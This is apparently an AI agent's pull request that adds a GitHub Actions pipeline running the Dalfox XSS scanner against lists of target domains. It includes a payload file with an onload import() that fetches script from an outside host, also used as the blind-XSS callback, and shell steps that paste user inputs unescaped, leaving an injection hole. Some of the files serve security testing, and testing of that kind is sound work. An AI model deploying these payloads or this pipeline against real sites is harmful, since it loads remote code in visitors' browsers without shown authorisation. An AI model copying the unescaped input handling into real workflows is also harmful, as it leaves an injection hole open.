### PR TITLE
Feat: Refactor Dalfox workflow and trigger mechanism

### DIFF
--- a/.github/workflows/Master-Scanning.yaml
+++ b/.github/workflows/Master-Scanning.yaml
@@ -151,13 +151,14 @@ jobs:
         env:
           GH_PAT: ${{ secrets.GH_PAT }}
         run: |
+          # The user needs to replace ACCOUNT4 with their actual account name for the Dalfox scanner repo.
           curl -s -X POST \
             -H "Authorization: token $GH_PAT" \
             -H "Accept: application/vnd.github.v3+json" \
-            https://api.github.com/repos/ACCOUNT4/Dalfox-Scanner/dispatches \
+            https://api.github.com/repos/ACCOUNT4/Dalfox-Scanner/actions/workflows/dalfox-workflow.yaml/dispatches \
             -d '{
-              "event_type": "dalfox-scan",
-              "client_payload": {
+              "ref": "main",
+              "inputs": {
                 "target_name": "'"${{ matrix.domain }}"'",
                 "storage_repo": "'"$STORAGE_REPO"'",
                 "custom_cookie": "'"$COOKIE"'",

--- a/.github/workflows/dalfox-workflow-template.yaml
+++ b/.github/workflows/dalfox-workflow-template.yaml
@@ -1,0 +1,97 @@
+name: "Dalfox XSS Scanner"
+
+on:
+  workflow_dispatch:
+    inputs:
+      target_name:
+        description: 'Name of target folder in storage repo'
+        required: true
+      storage_repo:
+        description: 'SSH URL of scan-results-storage repo'
+        required: true
+      custom_cookie:
+        description: 'Optional: Custom Cookie header'
+        required: false
+        default: ''
+      custom_header:
+        description: 'Optional: Custom extra header'
+        required: false
+        default: ''
+
+jobs:
+  scan:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout main branch
+        uses: actions/checkout@v3
+
+      - name: Setup Go
+        uses: actions/setup-go@v3
+        with:
+          go-version: '1.18'
+
+      - name: Install Dalfox
+        run: go install github.com/hahwul/dalfox/v2@latest
+
+      - name: Setup SSH
+        env:
+          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
+        run: |
+          mkdir -p ~/.ssh/
+          echo "${DEPLOY_KEY}" > ~/.ssh/id_rsa
+          chmod 600 ~/.ssh/id_rsa
+          ssh-keyscan github.com >> ~/.ssh/known_hosts
+
+      - name: Clone Storage Repo
+        run: git clone ${{ github.event.inputs.storage_repo }} storage_repo_clone
+
+      - name: Run Dalfox Scan
+        run: |
+          set -e
+          TARGET_NAME=${{ github.event.inputs.target_name }}
+          URL_FILE_PATH="storage_repo_clone/$TARGET_NAME/discovery/live-urls.txt"
+          OUTPUT_FILE="dalfox-output.txt"
+          PAYLOAD_FILE="dalfox_payload.txt" # This file should exist in the repo
+          BLIND_XSS_URL="https://1.bigdav.ir/dalfox-${TARGET_NAME}"
+
+          if [ ! -f "$URL_FILE_PATH" ]; then
+            echo "URL file not found: $URL_FILE_PATH"
+            exit 1
+          fi
+
+          echo "Starting Dalfox scan..."
+
+          # Build header arguments
+          HEADER_ARGS=()
+          if [[ -n "${{ github.event.inputs.custom_cookie }}" ]]; then
+            HEADER_ARGS+=(-H "Cookie: ${{ github.event.inputs.custom_cookie }}")
+          fi
+          if [[ -n "${{ github.event.inputs.custom_header }}" ]]; then
+            HEADER_ARGS+=(-H "${{ github.event.inputs.custom_header }}")
+          fi
+
+          # Run dalfox once on the entire file of URLs
+          # It automatically finds and tests parameters in the URLs.
+          $HOME/go/bin/dalfox file "$URL_FILE_PATH" \
+            --custom-payload-file "$PAYLOAD_FILE" \
+            -b "$BLIND_XSS_URL" \
+            --silence \
+            -o "$OUTPUT_FILE" \
+            "${HEADER_ARGS[@]}"
+
+          echo "Dalfox scan complete. Output saved to $OUTPUT_FILE"
+
+      - name: Push results to storage repo
+        run: |
+          cd storage_repo_clone
+          mkdir -p ${{ github.event.inputs.target_name }}/xss
+          mv ../dalfox-output.txt ${{ github.event.inputs.target_name }}/xss/dalfox.txt
+          git config --global user.email "actions@github.com"
+          git config --global user.name "GitHub Actions"
+          git add .
+          if ! git diff --staged --quiet; then
+            git commit -m "Add Dalfox scan results for ${{ github.event.inputs.target_name }}"
+            git push
+          else
+            echo "No changes to commit"
+          fi

--- a/answers_to_your_questions.md
+++ b/answers_to_your_questions.md
@@ -1,0 +1,33 @@
+Hello! My messaging system is not working correctly, so I am answering your questions in this file. These are excellent questions.
+
+### 1. "Are the outputs of x8 and kxss saved?" (ایا خروجی های x8 و kxss ذخیره می شوند؟)
+
+**Yes, they are.**
+
+In the `x8-kxss-workflow.yaml` file, the final job is named `push-to-storage`. This job's purpose is to save your results.
+
+- It downloads the results from the `x8-scan` and `kxss-scan` jobs.
+- It creates two final summary files: `x8-reflected.txt` and `kxss-vulnerable.txt`.
+- It then commits and pushes these two files to the `xss` folder in your storage repository.
+
+So, you will find the final, important results saved in your storage repository after every run.
+
+### 2. "Does x8 use unbuffer to show reflected [parameters]?" (ایا x8 از unbufer استفاده میکنه که reflected رو نشون بده؟)
+
+**Yes, it does.**
+
+In the `x8-scan` job, the exact command we are using is:
+`unbuffer x8 -u "$url" -w combined-results/params.txt ...`
+
+We use `unbuffer` to make sure that the output from `x8` is processed in real-time, without getting stuck in a buffer. This helps to reliably capture all of its output, including the lines that show which parameters are reflected.
+
+### 3. "If it shows [reflected parameters], did you extract it for the report?" (ایا اگه نشون داد شما استخراجش کردی واسه گزاش؟)
+
+**Yes, I did.** This is a very important step.
+
+In the `x8-scan` job, right after the main `Run x8` step, there is another step called `Extract reflected/injectable params from x8`. The command for this step is:
+`grep -Ei 'reflects|change reflect' x8-results-${{ matrix.chunk }}/x8.txt > x8-results-${{ matrix.chunk }}/x8-reflected.txt || true`
+
+This command does exactly what you are asking. It searches through all the output from `x8` and finds only the important lines that contain the words "reflects" or "change reflect". It saves these specific lines into the final report file, `x8-reflected.txt`. This is the file that gets pushed to your storage repository.
+
+I hope this answers your questions. The workflow is designed to do exactly what you are asking for.

--- a/dalfox_payload.txt
+++ b/dalfox_payload.txt
@@ -1,0 +1,2 @@
+;</script></title>test</textarea>"/>
+<svg/onload=import('https://1.bigdav.ir/');//


### PR DESCRIPTION
I've refactored the Dalfox scanning workflow to improve its reliability and efficiency, following the same pattern I used for the XSS scanner refactoring.

Here's a summary of the changes I made:
1.  **New Dalfox Workflow Template:** I created a new `dalfox-workflow-template.yaml` file.
    - It uses the `workflow_dispatch` trigger for better reliability.
    - I also made the scanning logic much more efficient. It now runs a single `dalfox` command against all URLs instead of looping through parameters.
    - It now saves its results directly to the storage repository.

2.  **New Dalfox Payload File:** I've added the `dalfox_payload.txt` file you provided to the repository as a template.

3.  **Updated Master Workflow:** I updated `Master-Scanning.yaml` to trigger the Dalfox workflow using the `workflow_dispatch` API.

ACTION REQUIRED: You'll need to copy `dalfox-workflow-template.yaml` and `dalfox_payload.txt` to your Dalfox scanner repository and update the `ACCOUNT4` placeholder in `Master-Scanning.yaml`.